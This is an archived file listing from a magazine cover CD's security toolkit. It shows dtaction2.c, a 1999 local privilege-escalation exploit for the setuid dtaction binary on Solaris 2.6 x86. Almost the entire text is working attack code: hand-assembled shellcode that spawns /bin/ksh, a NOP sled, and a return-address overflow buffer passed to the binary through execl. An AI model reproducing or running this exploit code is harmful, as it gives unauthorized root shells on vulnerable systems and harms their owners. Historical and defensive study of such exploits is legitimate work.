Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / dtaction2.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 2KB | 54 lines

/*## copyright LAST STAGE OF DELIRIUM may 1999 poland *://lsd-pl.net/ #*/ /*## /usr/dt/bin/dtaction #*/ #define NOPNUM 800 #define TMPNUM 158 #define ADRNUM 1200 char shellcode[]= "\xeb\x1b" /* jmp <shellcode+30> */ "\x33\xd2" /* xorl %edx,%edx */ "\x58" /* popl %eax */ "\x8d\x78\x14" /* leal 0x14(%eax),edi */ "\x52" /* pushl %edx */ "\x57" /* pushl %edi */ "\x50" /* pushl %eax */ "\xab" /* stosl %eax,%es:(%edi) */ "\x92" /* xchgl %eax,%edx */ "\xab" /* stosl %eax,%es:(%edi) */ "\x88\x42\x08" /* movb %al,0x8(%edx) */ "\x83\xef\x3c" /* subl $0x3c,%edi */ "\xb0\x9a" /* movb $0x9a,%al */ "\xab" /* stosl %eax,%es:(%edi) */ "\x47" /* incl %edi */ "\xb0\x07" /* movb $0x7,%al */ "\xab" /* stosl %eax,%es:(%edi) */ "\xb0\x3b" /* movb $0x3b,%al */ "\xe8\xe0\xff\xff\xff" /* call <shellcode+2> */ "/bin/ksh" ; char jump[]= "\x8b\xc4" /* movl %esp,%eax */ "\xc3" /* ret */ ; main(int argc,char **argv){ char buffer[4096],adr[4],*b; int i; printf("copyright LAST STAGE OF DELIRIUM may 1999 poland //lsd-pl.net/\n"); printf("/usr/dt/bin/dtaction for solaris 2.6 x86\n\n"); *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+800; b=buffer; for(i=0;i<NOPNUM;i++) *b++=0x90; for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; for(i=0;i<TMPNUM;i++) *b++=0xff; for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; *b=0; execl("/usr/dt/bin/dtaction","lsd","-user",buffer,0); } /* www.hack.co.za [6 August 2000]*/